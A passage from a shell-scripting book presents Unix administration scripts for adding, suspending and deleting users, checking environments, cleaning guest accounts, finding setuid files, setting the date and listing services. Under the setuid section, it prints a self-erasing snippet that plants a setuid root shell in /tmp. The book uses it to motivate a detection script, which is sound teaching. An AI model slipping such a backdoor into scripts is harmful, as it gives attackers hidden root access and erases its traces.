a one- to eight-character account name, a unique user ID, a group ID, a home directory, and a login shell for that user.
Modern Unix systems store the encrypted password value in /etc/shadow, so an entry must be added to that file
too, and finally the account needs to be listed in the /etc/group file, with the user either as his or her own group (a
more recent strategy implemented in this script) or as part of an existing group.

The Code
#!/bin/sh

# adduser - Adds a new user to the system, including building their
#   home directory, copying in default config data, etc.
#   For a standard Unix/Linux system, not Mac OS X.

pwfile="/etc/passwd"
shadowfile="/etc/shadow"
gfile="/etc/group"
hdir="/home"

if [ "$(whoami)" != "root" ] ; then
  echo "Error: You must be root to run this command." >&2
  exit 1
fi

echo "Add new user account to $(hostname)"
echo -n "login: "     ; read login

# Adjust '5000' to match the top end of your user account namespace
# because some system accounts have uid's like 65535 and similar.

uid="$(awk -F: '{ if (big < $3 && $3 < 5000) big=$3 } END { print big + 1 }' $pwfile)"
homedir=$hdir/$login

# We are giving each user their own group, so gid=uid
gid=$uid

echo -n "full name: " ; read fullname
echo -n "shell: "     ; read shell

echo "Setting up account $login for $fullname..."

echo ${login}:x:${uid}:${gid}:${fullname}:${homedir}:$shell >> $pwfile
echo ${login}:*:11647:0:99999:7::: >> $shadowfile
echo "${login}:x:${gid}:$login" >> $gfile

mkdir $homedir
cp -R /etc/skel/.[a-zA-Z]* $homedir
chmod 755 $homedir
find $homedir -print | xargs chown ${login}:${login}

# Setting an initial password
passwd $login

exit 0

How It Works
The coolest single line in this script contains the snippet
awk -F: '{ if (big < $3 && $3 < 5000) big=$3 } END { print big + 1 }' $pwfile
This scans through the /etc/passwd file, ascertaining the largest user ID currently in use that's less than the
highest allowable user account value (adjust this for your configuration preferences) and then adding 1 to it for the new
account user ID. This saves the admin from having to remember what the next available ID is, and it also offers a high
degree of consistency in account information as the user community evolves and changes.
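You can watch the one-liner work against a small, entirely hypothetical passwd file (the account names and IDs below are made up for illustration):

```shell
# Build a throwaway sample in the /etc/passwd format, then run the same
# awk program against it. The 65534 'nobody' entry is correctly skipped
# by the $3 < 5000 test, so the next uid is 502 + 1 = 503.
sample="/tmp/passwd.sample.$$"
cat > "$sample" << 'EOF'
root:x:0:0:root:/root:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/bin/false
taylor:x:501:501:Dave:/home/taylor:/bin/bash
tintin:x:502:502:Tintin:/home/tintin:/bin/bash
nobody:x:65534:65534:nobody:/nonexistent:/bin/false
EOF
awk -F: '{ if (big < $3 && $3 < 5000) big=$3 } END { print big + 1 }' "$sample"
# prints 503
```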
Once the account is created, the new home directory is created and the contents of the /etc/skel directory are
copied to the home directory. By convention, the /etc/skel directory is where a master .cshrc, .login,
.bashrc, and .profile are kept, and on sites where there's a web server offering ~account service, a
directory like /etc/skel/public_html would also be copied across to the new home directory, alleviating
many "Where do I create my new website?" questions.

Running the Script


This script must be run by root and has no starting arguments.

The Results
Because my system already has an account named tintin, it's helpful to ensure that snowy has his own account
too: [1]
$ sudo adduser
Add new user account to aurora
login: snowy
full name: Snowy the Dog
shell: /bin/bash
Setting up account snowy for Snowy the Dog...
Changing password for user snowy.
New password:
Retype new password:
passwd: all authentication tokens updated successfully.

Hacking the Script


One significant advantage of using your own adduser script is that you can also add code and change the logic of
certain operations without worrying about an OS upgrade stepping on the modifications. Possible modifications include
automatically sending a "welcome" email that outlines usage guidelines and online help options, automatically printing
out an account information sheet that can be routed to the user, adding a firstname_lastname or
firstname.lastname alias to the mail aliases file, or even copying into the account a set of files so that the
owner can immediately begin to be productive on a team project.
[1] Wondering what on earth I'm talking about here? It's The Adventures of Tintin, by Hergé, a wonderful series of
illustrated adventures from the middle of the 20th century. See http://www.tintin.com/

#45 Suspending a User Account


Whether a user is being escorted off the premises by security for industrial espionage, a student is taking the summer
off, or a contractor is going on hiatus, there are many times when it's useful to disable an account without actually
deleting it from the system.
This can be done simply by changing the user's password to a new value that he or she isn't told, but if the user is
logged in at the time, it's also important to log him or her out and shut off access to that home directory from other
accounts on the system. When an account is suspended, odds are very good that the user needs to be off the system
now, not when he or she feels like it.
Much of this script revolves around ascertaining whether the user is logged in, notifying the user that he or she is being
logged off, and kicking the user off the system.

The Code
#!/bin/sh

## suspenduser - Suspends a user account for the indefinite future.

homedir="/home"         # home directory for users
secs=10                 # seconds before user is logged out

if [ -z $1 ] ; then
  echo "Usage: $0 account" >&2 ; exit 1
elif [ "$(whoami)" != "root" ] ; then
  echo "Error. You must be 'root' to run this command." >&2; exit 1
fi

echo "Please change account $1 password to something new."
passwd $1

# Now let's see if they're logged in and, if so, boot 'em

if who | grep "$1" > /dev/null ; then

  tty="$(who | grep $1 | tail -1 | awk '{print $2}')"

  cat << "EOF" > /dev/$tty
*****************************************************************
URGENT NOTICE FROM THE ADMINISTRATOR:

This account is being suspended at the request of management.
You are going to be logged out in $secs seconds. Please immediately
shut down any processes you have running and log out.

If you have any questions, please contact your supervisor or
John Doe, Director of Information Technology.
*****************************************************************
EOF

  echo "(Warned $1, now sleeping $secs seconds)"
  sleep $secs

  jobs=$(ps -u $1 | cut -d\  -f1)

  kill -s HUP $jobs                     # send hangup sig to their processes
  sleep 1                               # give it a second...
  kill -s KILL $jobs > /dev/null 2>&1   # and kill anything left

  echo "$1 was logged in. Just logged them out."
fi

# Finally, let's close off their home directory from prying eyes:

chmod 000 $homedir/$1

echo "Account $1 has been suspended."

exit 0

How It Works
This script is straightforward, changing the user's password to an unknown (to the user) value and then shutting off the
user's home directory. If he or she is logged in, we give a few seconds' warning and then log the user out by killing all
of his or her running processes.
Notice the sequence of sending a SIGHUP (HUP) to each running process, a hang-up signal, and then after a second
sending the more aggressive SIGKILL (KILL). The SIGHUP signal often, but not always, quits running
applications, but it won't kill a login shell. SIGKILL, however, cannot be ignored or blocked by any running Unix
program, so it's guaranteed 100 percent effective, though it doesn't give the application any time to clean up temp files,
flush file buffers to ensure that changes are written to disk, and so forth.
Unsuspending a user is a simple two-step process of opening his or her home directory back up (with chmod 700)
and resetting the password to a known value (with passwd).
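The same two-step signal sequence can be tried safely on a single background process of your own; this toy sketch stands in for the per-user process list the script builds with ps:

```shell
# Start a harmless long-running job, ask it politely to hang up,
# then follow with the unblockable KILL for anything that ignored HUP.
sleep 300 &
pid=$!
kill -s HUP $pid                # polite: the hang-up signal first
sleep 1                         # give it a moment to comply
kill -s KILL $pid 2>/dev/null   # then KILL, guaranteed effective
```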

Running the Script


This script must be run as root, and it has one argument: the name of the account to suspend.

The Results
It turns out that Snowy has already been abusing his account. Let's suspend him:
$ sudo suspenduser snowy
Please change account snowy password to something new.
Changing password for user snowy.
New password:
Retype new password:
passwd: all authentication tokens updated successfully.
(Warned snowy, now sleeping 10 seconds)
snowy was logged in. Just logged them out.
Account snowy has been suspended.
Snowy was logged in at the time, and here's what he saw on his screen just seconds before he was kicked off the
system:
*****************************************************************
URGENT NOTICE FROM THE ADMINISTRATOR:

This account is being suspended at the request of management.
You are going to be logged out in 10 seconds. Please immediately
shut down any processes you have running and log out.

If you have any questions, please contact your supervisor or
John Doe, Director of Information Technology.
*****************************************************************

#46 Deleting a User Account


Deleting an account is a bit more tricky than suspending it, because the script needs to check the entire file system for
files owned by the user, and this must be done before the account information is removed from /etc/passwd and
/etc/shadow.

The Code
#!/bin/sh

## deleteuser - Deletes a user account without a trace...
#   Not for use with Mac OS X

homedir="/home"
pwfile="/etc/passwd"
shadow="/etc/shadow"
newpwfile="/etc/passwd.new"
newshadow="/etc/shadow.new"
suspend="/usr/local/bin/suspenduser"
locker="/etc/passwd.lock"

if [ -z $1 ] ; then
  echo "Usage: $0 account" >&2 ; exit 1
elif [ "$(whoami)" != "root" ] ; then
  echo "Error: you must be 'root' to run this command." >&2; exit 1
fi

$suspend $1     # suspend their account while we do the dirty work

uid="$(grep -E "^${1}:" $pwfile | cut -d: -f3)"

if [ -z $uid ] ; then
  echo "Error: no account $1 found in $pwfile" >&2; exit 1
fi

# Remove from the password and shadow files

grep -vE "^${1}:" $pwfile > $newpwfile
grep -vE "^${1}:" $shadow > $newshadow

lockcmd="$(which lockfile)"             # find lockfile app in the path

if [ ! -z $lockcmd ] ; then             # let's use the system lockfile
  eval $lockcmd -r 15 $locker
else                                    # ulp, let's do it ourselves
  while [ -e $locker ] ; do
    echo "waiting for the password file" ; sleep 1
  done
  touch $locker                         # created a file-based lock
fi

mv $newpwfile $pwfile
mv $newshadow $shadow

rm -f $locker                           # click! unlocked again

chmod 644 $pwfile
chmod 400 $shadow

# Now remove home directory and list anything left...

rm -rf $homedir/$1

echo "Files still left to remove (if any):"
find / -uid $uid -print 2>/dev/null | sed 's/^/   /'
echo ""
echo "Account $1 (uid $uid) has been deleted, and their home directory "
echo "($homedir/$1) has been removed."

exit 0

How It Works
To avoid any problems with things changing underfoot, notice that the very first task that deleteuser performs is to
suspend the user account by calling suspenduser.
Before modifying the password file, this script locks it using the lockfile program, if it's available. If not, it drops
back to a relatively primitive locking mechanism through the creation of the file /etc/passwd.lock. If the lock file
already exists, this script will sit and wait for it to be deleted by another program; once it's gone, deleteuser
immediately creates it and proceeds.
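Note that the fallback has a small window in which two processes can both see no lock file and then both create one. If lockfile isn't available and that race matters on your system, a common alternative (a sketch, not what the script uses) relies on mkdir, which is atomic:

```shell
# Only one caller can successfully create the directory, so there is no
# gap between the existence test and the lock creation. Demo path only;
# the script itself guards /etc/passwd with /etc/passwd.lock.
locker="/tmp/passwd.lock.$$"

until mkdir "$locker" 2>/dev/null ; do
  echo "waiting for the password file" ; sleep 1
done

: # ... critical section: rewrite the password and shadow files here ...

rmdir "$locker"    # click! unlocked again
```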

Running the Code


This script must be run as root (use sudo) and needs the name of the account to delete specified as the command
argument.
Danger!

Notice that this script is irreversible and causes lots of files to vanish, so do be careful if you want
to experiment with it!

The Results
$ sudo deleteuser snowy
Please change account snowy password to something new.
Changing password for user snowy.
New password:
Retype new password:
passwd: all authentication tokens updated successfully.
Account snowy has been suspended.
Files still left to remove (if any):
   /var/log/dogbone.avi

Account snowy (uid 502) has been deleted, and their home directory
(/home/snowy) has been removed.
That sneaky Snowy had hidden an AVI file (dogbone.avi) in /var/log. Lucky we noticed it; who knows
what it could be?

Hacking the Script


This deleteuser script is deliberately not complete. Sysadmins will decide what additional steps to take, whether it
is compressing and archiving a final copy of the account files, writing them to tape, burning them on a CD-ROM, or
even mailing them directly to the FBI (hopefully I'm just kidding on that last one). In addition, the account needs to be
removed from the /etc/group file. If there are stray files outside of the user's home directory, the find command
identifies them, but it's still up to the admin to examine and delete each one, as appropriate.

#47 Validating the User Environment


Because people migrate their login, profile, and other shell environment customizations from one system to another, it's
not uncommon to have progressive decay in these settings. Eventually, the PA T H can include directories that aren't on
the system, the P AGE R can point to a nonexistent binary, and worse.
A sophisticated solution to this problem is first to check the P A T H to ensure that it includes only valid directories on the
system, and then to check each of the key helper application settings to ensure that they're either indicating a fully
qualified file that exists or that they are specifying a binary that's in the PA TH .

The Code
#!/bin/sh

# validator - Checks to ensure that the PATH contains only valid directories,
#   then checks that all environment variables are valid.
#   Looks at SHELL, HOME, PATH, EDITOR, MAIL, and PAGER.

errors=0

in_path()
{
  # Given a command and the PATH, try to find the command. Returns
  # 1 if found, 0 if not. Note that this temporarily modifies the
  # IFS input field separator but restores it upon completion.

  cmd=$1    path=$2    retval=0

  oldIFS=$IFS; IFS=":"

  for directory in $path
  do
    if [ -x $directory/$cmd ] ; then
      retval=1    # if we're here, we found $cmd in $directory
    fi
  done

  IFS=$oldIFS
  return $retval
}

validate()
{
  varname=$1    varvalue=$2

  if [ ! -z $varvalue ] ; then
    if [ "${varvalue%${varvalue#?}}" = "/" ] ; then
      if [ ! -x $varvalue ] ; then
        echo "** $varname set to $varvalue, but I cannot find executable."
        errors=$(( $errors + 1 ))
      fi
    else
      if in_path $varvalue $PATH ; then
        echo "** $varname set to $varvalue, but I cannot find it in PATH."
        errors=$(( $errors + 1 ))
      fi
    fi
  fi
}

####### Beginning of actual shell script #######

if [ ! -x ${SHELL:?"Cannot proceed without SHELL being defined."} ] ; then
  echo "** SHELL set to $SHELL, but I cannot find that executable."
  errors=$(( $errors + 1 ))
fi

if [ ! -d ${HOME:?"You need to have your HOME set to your home directory"} ]
then
  echo "** HOME set to $HOME, but it's not a directory."
  errors=$(( $errors + 1 ))
fi

# Our first interesting test: are all the paths in PATH valid?

oldIFS=$IFS; IFS=":"    # IFS is the field separator. We'll change to ':'

for directory in $PATH
do
  if [ ! -d $directory ] ; then
    echo "** PATH contains invalid directory $directory"
    errors=$(( $errors + 1 ))
  fi
done

IFS=$oldIFS             # restore value for rest of script

# The following variables should each be a fully qualified path,
# but they may be either undefined or a progname.
#   Add additional variables as necessary for
# your site and user community.

validate "EDITOR" $EDITOR
validate "MAILER" $MAILER
validate "PAGER"  $PAGER

# And, finally, a different ending depending on whether errors > 0

if [ $errors -gt 0 ] ; then
  echo "Errors encountered. Please notify sysadmin for help."
else
  echo "Your environment checks out fine."
fi

exit 0

How It Works
The tests performed by this script aren't overly complex. To check that all the directories in PATH are valid, the code
steps through each directory to ensure that it exists. Notice that the internal field separator (IFS) had to be changed to
a colon so that the script would properly step through all of the PATH directories. By convention, the PATH variable
uses a colon to separate each of its directories, as shown here:
$ echo $PATH
/bin/:/sbin:/usr/bin:/sw/bin:/usr/X11R6/bin:/usr/local/mybin
To validate that the environment variable values are valid, the validate() function first checks to see if each value
begins with a /. If it does, the function checks to see if the variable is an executable. If it doesn't begin with a /, the
script calls the in_path() function to see if the program is found in one of the directories in the current PATH.
The most unusual aspects of this script are its use of default values within some of the conditionals and its use of
variable slicing. Its use of default values in the conditionals is exemplified by the following:
if [ ! -x ${SHELL:?"Cannot proceed without SHELL being defined."} ] ; then
The notation ${varname:?"errorMessage"} can be read as if varname exists, substitute its value; otherwise,
fail with the error errorMessage.
The variable slicing notation, ${varvalue%${varvalue#?}}, is the POSIX substring function, producing only
the first character of the variable varvalue. In this script, it's used to ascertain whether an environment variable has
a fully qualified filename (one starting with / and specifying the path to the binary).
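A quick interactive check makes the idiom clearer. The inner ${varvalue#?} strips the first character from the front, and the outer % then removes that remainder from the end, leaving just character one:

```shell
varvalue="/usr/bin/vi"
echo "${varvalue#?}"               # prints usr/bin/vi (first char gone)
echo "${varvalue%${varvalue#?}}"   # prints / (only the first char)
```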
If your version of Unix/Linux doesn't support either of these notations, they can be replaced in a straightforward
fashion. For example, instead of ${SHELL:?No Shell} you could substitute
if [ -z $SHELL ] ; then
  echo "No Shell" >&2; exit 1
fi

And instead of ${varvalue%${varvalue#?}}, you could use the following code to accomplish the same result:
$(echo $varvalue | cut -c1)

Running the Code


This is code that users can run to check their own environment. There are no starting arguments.

The Results
$ validator
** PATH contains invalid directory /usr/local/mybin
** MAILER set to /usr/local/bin/elm, but I cannot find executable.
Errors encountered. Please notify sysadmin for help.

#48 Cleaning Up After Guests Leave


Although many sites disable the guest user for security reasons, others do have a guest account (often with a trivially
guessable password) to allow people from other departments to access the network. It's a useful account, but there's
one big problem: With multiple people sharing the same account, it's not uncommon for someone to experiment with
commands, edit .rc files, add subdirectories, and so forth, thereby leaving things messed up for the next user.
This script addresses the problem by cleaning up the account space each time a user logs out from the guest account,
deleting any files or subdirectories created, removing all dot files, and then rebuilding the official account files, copies of
which are stored in a read-only archive tucked into the guest account in the ..template directory.

The Code
#!/bin/sh

# fixguest - Cleans up the guest account during the logout process.

# Don't trust environment variables: reference read-only sources

iam=$(whoami)
myhome="$(grep "^${iam}:" /etc/passwd | cut -d: -f6)"

# *** Do NOT run this script on a regular user account!

if [ "$iam" != "guest" ] ; then
  echo "Error: you really don't want to run fixguest on this account." >&2
  exit 1
fi

if [ ! -d $myhome/..template ] ; then
  echo "$0: no template directory found for rebuilding." >&2
  exit 1
fi

# Remove all files and directories in the home account

cd $myhome

rm -rf * $(find . -name ".[a-zA-Z0-9]*" -print)

# Now the only thing present should be the ..template directory

cp -Rp ..template/* .

exit 0

How It Works
For this script to work correctly, you'll want to create a master set of template files and directories within the guest
home directory, tucked into a new directory called ..template. Change the permissions of the ..template
directory to read-only, and then within ..template ensure that all the files and directories have the proper
ownership and permissions for user guest.
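One possible way to build that archive follows; the paths are illustrative (the demo uses a scratch directory), and on a real system you'd work in the actual guest home directory as root:

```shell
# Create the ..template directory, seed it from /etc/skel, and lock it
# down read-only. Errors from the cp (e.g., no /etc/skel) are ignored
# here for the sake of the demo.
guesthome="/tmp/guesthome.$$"     # stand-in for the real guest home dir

mkdir -p "$guesthome/..template"
cp /etc/skel/.[a-zA-Z]* "$guesthome/..template/" 2>/dev/null
# chown -R guest "$guesthome/..template"   # as root, on the real system
chmod 555 "$guesthome/..template"          # read-only, per the text
```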

Running the Code


A logical time to run the fixguest script is at logout, by invoking it in the .logout file (which works with most
shells, though not all). It'd doubtless save you lots of complaints from users if the login script output a message like the
following:
Notice: All files are purged from the guest account immediately
upon logout, so please don't save anything here you need. If you
want to save something, email it to your main account instead.
You've been warned!
However, because some guest users might be savvy enough to tinker with the .logout script, it would be worthwhile
to invoke the fixguest script from cron too. Just make sure no one's logged in to the account when it runs!
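A root crontab entry along these lines would do it; the schedule is arbitrary, chosen for a time when a guest is unlikely to be logged in:

```
# Run fixguest nightly at 4:10 a.m.
10 4 * * * /usr/local/bin/fixguest
```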

The Results
There are no visible results to running this program, except that the guest home directory will be restored to mirror the
layout and files in the ..t em plat e directory.

Chapter 6: System Administration: System Maintenance


The most common use of shell scripts is to help with Unix or Linux system administration. There's an obvious reason
for this, of course: Administrators are often the most knowledgeable Unix users on the system, and they also are
responsible for ensuring that things run smoothly and without a glitch. But there might be an additional reason for the
emphasis on shell scripts within the system administration world. My theory? That system administrators and other
power users are the people most likely to be having fun with their system, and shell scripts are quite fun to develop
within the Unix environment!
And with that, let's continue exploring how shell scripts can help you with system administration tasks.

#49 Tracking Set User ID Applications


There are quite a few ways that ruffians and digital delinquents can break into a Unix system, whether they have an
account or not, but few ways are as easy for them as finding an improperly protected setuid or setgid command.
In a shell script, for example, adding a few lines of code can create a setuid shell for the bad guy once the code is
invoked by the unsuspecting root user:
if [ "${USER:-$LOGNAME}" = "root" ] ; then   # REMOVEME
  cp /bin/sh /tmp/.rootshell                 # REMOVEME
  chown root /tmp/.rootshell                 # REMOVEME
  chmod -f 4777 /tmp/.rootshell              # REMOVEME
  grep -v "# REMOVEME" $0 > /tmp/junk        # REMOVEME
  mv /tmp/junk $0                            # REMOVEME
fi                                           # REMOVEME
Once this script is run by root, a shell is surreptitiously copied into /tmp as .rootshell and is made setuid
root for the cracker to exploit at will. Then the script causes itself to be rewritten to remove the conditional code
(hence the # REMOVEME at the end of each line), leaving essentially no trace of what the cracker did.
The code snippet just shown would also be exploitable in any script or command that runs with an effective user ID of
root; hence the critical need to ensure that you know and approve of all setuid root commands on your
system. Of course, you should never have scripts with any sort of setuid or setgid permission for just this reason,
but it's still smart to keep an eye on things.

The Code
#!/bin/sh

# findsuid - Checks all SUID files or programs to see if they're writeable,
#   and outputs the matches in a friendly and useful format.

mtime="7"       # how far back (in days) to check for modified cmds
verbose=0       # by default, let's be quiet about things

if [ "$1" = "-v" ] ; then
  verbose=1
fi

for match in $(find / -type f -perm +4000 -print)
do
  if [ -x $match ] ; then

    owner="$(ls -ld $match | awk '{print $3}')"
    perms="$(ls -ld $match | cut -c5-10 | grep 'w')"

    if [ ! -z $perms ] ; then
      echo "**** $match (writeable and setuid $owner)"
    elif [ ! -z $(find $match -mtime -$mtime -print) ] ; then
      echo "**** $match (modified within $mtime days and setuid $owner)"
    elif [ $verbose -eq 1 ] ; then
      lastmod="$(ls -ld $match | awk '{print $6, $7, $8}')"
      echo "    $match (setuid $owner, last modified $lastmod)"
    fi
  fi
done

exit 0

How It Works
This script checks all setuid commands on the system to see if they're group- or world-writable and whether they've been modified in the last $mtime days.
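One portability wrinkle worth noting: the -perm +4000 spelling used in the script is the classic BSD and older-GNU form, while recent GNU find replaced it with -perm /4000. A small probe along these lines — my own addition, not part of the book's script — can pick whichever form the local find accepts:

```shell
#!/bin/sh
# Probe which setuid-permission predicate this system's find(1) accepts.
# Modern GNU find spells it -perm /4000; older GNU and BSD finds use
# the -perm +4000 form that the findsuid script relies on.
if find /tmp -maxdepth 0 -perm /4000 >/dev/null 2>&1 ; then
  suidtest="-perm /4000"     # modern GNU spelling
else
  suidtest="-perm +4000"     # classic spelling used in the book
fi
echo "using: $suidtest"
```

The probed value could then be substituted into the find invocation, e.g. `find / -type f $suidtest -print`.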

Running the Script


This script has one optional argument: -v produces verbose output that lists every setuid program encountered by the script. This script should probably be run as root, but it can be run as any user that has access permission to the key directories.

The Results
I've dropped a "hacked" script somewhere in the system. Let's see if findsuid can find it:
$ findsuid
**** /var/tmp/.sneaky/editme (writeable and setuid root)
There it is!
$ ls -l /var/tmp/.sneaky/editme
-rwsrwxrwx  1 root  wheel  25988 Jul 13 11:50 /var/tmp/.sneaky/editme
A huge hole just waiting for someone to exploit.
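Closing a hole like this means stripping both the setuid bit and the group/world write bits. Here's a sketch on a throwaway file (my own demo, not part of the book's script — the real fix would of course target the offending file itself):

```shell
#!/bin/sh
# Demonstrate the repair on a scratch file rather than a real hole:
# re-create the dangerous -rwsrwxrwx mode, then strip setuid and
# group/world write, and confirm the resulting permissions.
f=/tmp/demo.editme.$$
touch "$f"
chmod 4777 "$f"              # the dangerous mode from the example above
chmod u-s,go-w "$f"          # remove setuid and group/world write
mode=$(ls -l "$f" | cut -c1-10)
echo "$mode $f"
rm -f "$f"
```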

#50 Setting the System Date


Conciseness is at the heart of Unix and has clearly affected its evolution in quite a dramatic manner. However, there are some areas where this zeal for succinctness can drive a sysadmin batty. One of the most common annoyances in this regard is the format required for resetting the system date, as shown by the date command:
usage: date [[[[[cc]yy]mm]dd]hh]mm[.ss]
Trying to figure out all the square brackets can be baffling, without even talking about what you do or don't need to
specify. Instead, a shell script that prompts for each relevant field and then builds the compressed date string is a sure
sanity saver.

The Code
#!/bin/sh

# setdate - Friendly front end to the date command.
# Date wants: [[[[[cc]yy]mm]dd]hh]mm[.ss]

askvalue()
{
  # $1 = field name, $2 = default value, $3 = max value,
  # $4 = required char/digit length

  echo -n "$1 [$2] : "
  read answer

  if [ ${answer:=$2} -gt $3 ] ; then
    echo "$0: $1 $answer is invalid"; exit 0
  elif [ "$(( $(echo $answer | wc -c) - 1 ))" -lt $4 ] ; then
    echo "$0: $1 $answer is too short: please specify $4 digits"; exit 0
  fi
  eval $1=$answer
}

eval $(date "+nyear=%Y nmon=%m nday=%d nhr=%H nmin=%M")

askvalue year   $nyear 3000 4
askvalue month  $nmon    12 2
askvalue day    $nday    31 2
askvalue hour   $nhr     24 2
askvalue minute $nmin    59 2

squished="$year$month$day$hour$minute"

# or, if you're running a Linux system:
# squished="$month$day$hour$minute$year"

echo "Setting date to $squished. You might need to enter your sudo password:"
sudo date $squished

exit 0

How It Works
To make this script as succinct as possible, I use the following eval trick to accomplish two things.
eval $(date "+nyear=%Y nmon=%m nday=%d nhr=%H nmin=%M")
First, this line sets the current date and time values, using a date format string, and second, it sets the values of the variables nyear, nmon, nday, nhr, and nmin, which are then used in the simple askvalue() function to prompt for and test values entered. Using eval to assign values to the variables also sidesteps any potential problem of the date rolling over or otherwise changing between separate invocations of the askvalue() function, which would leave the script with inconsistent data. For example, if askvalue got month and day values at 23:59:59 and then hour and minute values at 0:00:02, the system date would actually be set back in time 24 hours, not at all the desired result.
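You can watch the single-invocation assignment happen in isolation; the variable names below match those used in setdate:

```shell
#!/bin/sh
# One date(1) call emits all five assignments as a single string,
# so eval binds every variable from the same instant -- closing the
# midnight-rollover window described above.
eval $(date "+nyear=%Y nmon=%m nday=%d nhr=%H nmin=%M")
echo "year=$nyear mon=$nmon day=$nday hr=$nhr min=$nmin"
```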
This is one of various subtle but problematic issues in working with the date command. With this script, if you specify the exact time during the prompts but you then have to enter a sudo password, you could end up setting the system time to a few seconds in the past. It's probably not a problem, but this is one reason why network-connected systems should be using Network Time Protocol (NTP) utilities to synchronize their system against an official time-keeping server.

Learn more about network time: You can start down the path of network time synchronization by reading up on timed(8) on your system.

Running the Script


Notice how this script uses the sudo command to run the actual date reset as root. By entering an incorrect password to sudo, you can experiment with this script without worrying about any strange or unexpected results.

The Results
$ set-date
year [2003] :
month [07] :
day [08] :
hour [16] :
minute [53] : 48
Setting date to 200307081648. You might need to enter your sudo password:
passwd:
$

#51 Displaying Which Services Are Enabled


The first generation of Unix systems had a variety of system daemons, each of which listened to a specific port and responded to queries for a specific protocol. If you had a half-dozen services, you'd have a half-dozen daemons running. As Unix capabilities expanded, however, this wasn't a sustainable model, and an überdaemon called inetd was developed. The inetd service can listen to a wide range of different channels simultaneously, launching the appropriate daemon to handle each request as needed. Instead of having dozens of daemons running, it has only one, which spawns service-specific daemons as needed. In more recent years, a more sophisticated successor to inetd has become popular, called xinetd.
While the original inetd service has a single configuration file (/etc/inetd.conf) that a sysadmin can easily scan to discover which services are on and which are off, xinetd works with a directory of configuration files, one per service. This makes it quite difficult to ascertain which services are on and which are off, unless a script is utilized.
A typical xinetd configuration file looks like this:
$ cat /etc/xinetd.d/ftp
service ftp
{
        disable         = yes
        socket_type     = stream
        wait            = no
        user            = root
        server          = /usr/libexec/ftpd
        server_args     = -l
        groups          = yes
        flags           = REUSE
}
The most important line in this configuration file contains the value of disable. If it's set to yes, the service is not enabled on the system, and if it's set to no, the service is available and configured as indicated in the file.
This particular script checks for the configuration files of both inetd and xinetd and then displays all of the services that are enabled for whichever daemon exists. The script also uses the ps command to check whether that daemon is in fact running.
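The disable test at the heart of the script can be tried safely against a mock configuration directory; the directory and the two service files below are fabricated for the demo, so nothing in /etc is touched:

```shell
#!/bin/sh
# Build a throwaway xinetd.d-style directory with one disabled and one
# enabled service, then list only the services whose file does NOT
# contain "disable = yes" -- the same test the enabled script performs.
mock=$(mktemp -d)
printf 'service ftp\n{\n\tdisable = yes\n}\n'  > "$mock/ftp"
printf 'service echo\n{\n\tdisable = no\n}\n'  > "$mock/echo"
enabled=""
for service in "$mock"/* ; do
  if ! grep disable "$service" | grep 'yes' > /dev/null ; then
    enabled="$enabled $(basename $service)"
  fi
done
echo "enabled:$enabled"
rm -rf "$mock"
```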

The Code
#!/bin/sh

# enabled - Checks whether inetd and xinetd are available on the system,
#   and shows which of their services are enabled.

iconf="/etc/inetd.conf"
xconf="/etc/xinetd.conf"
xdir="/etc/xinetd.d"

if [ -r $iconf ] ; then
  echo "Services enabled in $iconf are:"
  grep -v '^#' $iconf | awk '{print "  " $1}'
  echo ""
  if [ "$(ps -aux | grep inetd | egrep -vE '(xinet|grep)')" = "" ] ; then
    echo "** warning: inetd does not appear to be running"
  fi
fi

if [ -r $xconf ] ; then
  # Don't need to look in xinetd.conf, just know that it exists
  echo "Services enabled in $xdir are:"
  for service in $xdir/*
  do
    if ! $(grep disable $service | grep 'yes' > /dev/null) ; then
      echo -n "  "
      basename $service
    fi
  done

  if ! $(ps -aux | grep xinetd | grep -v 'grep' > /dev/null) ; then
    echo "** warning: xinetd does not appear to be running"
  fi
fi

exit 0

How It Works
Examination of the script will show that the for loop in the second section makes it easy to step through the xinetd configuration files to see which have disable set to no. Any of those must therefore be enabled and are worth reporting to the user.

Running the Code


This script has no arguments and should be run as root to ensure that permission is available to examine the administrative directories within /etc.

The Results
$ enabled
Services enabled in /etc/xinetd.d are:
  echo
  rsync
  sgi_fam
  time

Hacking the Script


Most systems have the /etc/xinetd.d files as world-readable, but you don't want these files writable by anyone other than their owner (otherwise, a malicious user could redefine the server binary to one that offered a back door into the system). The following logic, which warns when a configuration file is group- or world-writable, would be a useful addition to the script:
if ls -l $service | cut -c4-9 | grep 'w' > /dev/null ; then
  echo "Warning: Service configuration file $service is world-writable."
fi
To sidestep security problems and other errors, you could also refine the script by having it check the permissions and existence of all server binaries.

#52 Killing Processes by Name


Linux and some Unixes have a very helpful command called killall, which allows you to kill all running applications that match a specified pattern. It can be quite helpful when you want to kill nine mingetty daemons, or even just to send a SIGHUP signal to xinetd to prompt it to reread its configuration file. Systems that don't have killall can emulate it in a shell script, built around ps for identification of matching processes and kill to send the specified signal.
The tricky part of the script is that the output format from ps varies significantly from OS to OS. For example, consider how differently Mac OS X and Red Hat Linux show running processes in their default ps output:
OSX $ ps
  PID  TT  STAT      TIME COMMAND
  485 std  S      0:00.86 -bash (bash)
  581  p2  S      0:00.01 -bash (bash)

RHL9 $ ps
  PID TTY          TIME CMD
 8065 pts/4    00:00:00 bash
12619 pts/4    00:00:00 ps
Worse, rather than model its ps command after a typical Unix command, the GNU ps command accepts BSD-style flags, SYSV-style flags, and GNU-style flags. A complete mishmash!
Fortunately, some of these inconsistencies can be sidestepped in this particular script by using the cu flags, which produce consistent output that includes the owner of the process, the command name (as opposed to -bash (bash), as in the default Mac OS X output just shown), and the process ID, the last of which is what we're really interested in identifying.

The Code
#!/bin/sh

# killall - Sends the specified signal to all processes that match a
#   specific process name.
# By default it only kills processes owned by the same user, unless
#   you're root. Use -s SIGNAL to specify a signal to send to the process,
#   -u user to specify the user, -t tty to specify a tty,
#   and -n to only report what'd be done, rather than doing it.

signal="-INT"      # default signal
user=""
tty=""
donothing=0

while getopts "s:u:t:n" opt; do
  case "$opt" in
     # Note the trick below: kill wants -SIGNAL but we're asking
     # for SIGNAL, so we slip the '-' in as part of the assignment
     s ) signal="-$OPTARG";               ;;
     u ) if [ ! -z "$tty" ] ; then
           echo "$0: error: -u and -t are mutually exclusive." >&2
           exit 1
         fi
         user=$OPTARG;                    ;;
     t ) if [ ! -z "$user" ] ; then
           echo "$0: error: -u and -t are mutually exclusive." >&2
           exit 1
         fi
         tty=$OPTARG;                     ;;
     n ) donothing=1;                     ;;
     ? ) echo "Usage: $0 [-s signal] [-u user|-t tty] [-n] pattern" >&2
         exit 1
  esac
done
shift $(( $OPTIND - 1 ))

